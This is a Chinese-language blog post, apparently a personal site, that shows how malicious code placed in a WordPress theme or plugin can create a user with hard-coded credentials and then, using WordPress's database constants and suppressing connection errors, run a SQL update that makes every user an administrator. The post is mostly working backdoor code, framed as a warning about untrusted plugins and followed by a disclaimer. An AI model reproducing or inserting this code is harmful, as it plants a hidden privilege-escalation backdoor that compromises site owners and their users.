天気雨

All things bright and beautiful.

WordPress 中新建用户并粗暴提权

首先声明:好孩子请勿模仿,用在主题 / 插件里面做坏事分分钟被人打死。

之前看见 Hostker 微博 里面说有人被恶意插了,想起 以前 咱也做过同样的屎,所以嘛翻了下找到一些简单粗暴插恶意代码的玩意儿,毕竟都是 PHP 要插也是分分钟的事情。

首先新建个用户,这他妈太简单了,官方函数 就有教。

wp_create_user( 'test1234567', '12345678', 'test@test.com' );

然后你就会发现你的 WordPress 多了一个新用户,然而并没什么权限嘛。

PrtScr capture_7

那我们改数据库不就好了嘛,这很简单。不知道他们的数据库跟密码也没关系,WordPress 早就射常量了好嘛。

$con = mysql_connect(DB_HOST,DB_USER,DB_PASSWORD);
if (!$con)
  {
  /*
  die('Could not connect: ' . mysql_error());
  别跟人说你连接数据库错误好嘛
  */
  }

mysql_select_db(DB_NAME, $con);

mysql_query("update `" . DB_NAME . "`.`" . $table_prefix . "usermeta` set `meta_value` =  'a:1:{s:13:\"administrator\";b:1;}' where `" . $table_prefix . "usermeta`.`meta_key` = '" . $table_prefix . "capabilities'");

mysql_close($con);

PrtScr capture_8

然后所有用户都是管理员啦,然后你懂的啦。

免责声明:这篇文章是用来告诉你们来路不明的东西的危害,而不是教你们做坏事的。毕竟刀能切肉,也能砍人。

WordPress 中新建用户并粗暴提权 有 4 个评论

发表评论

电子邮件地址不会被公开。 必填项已用*标注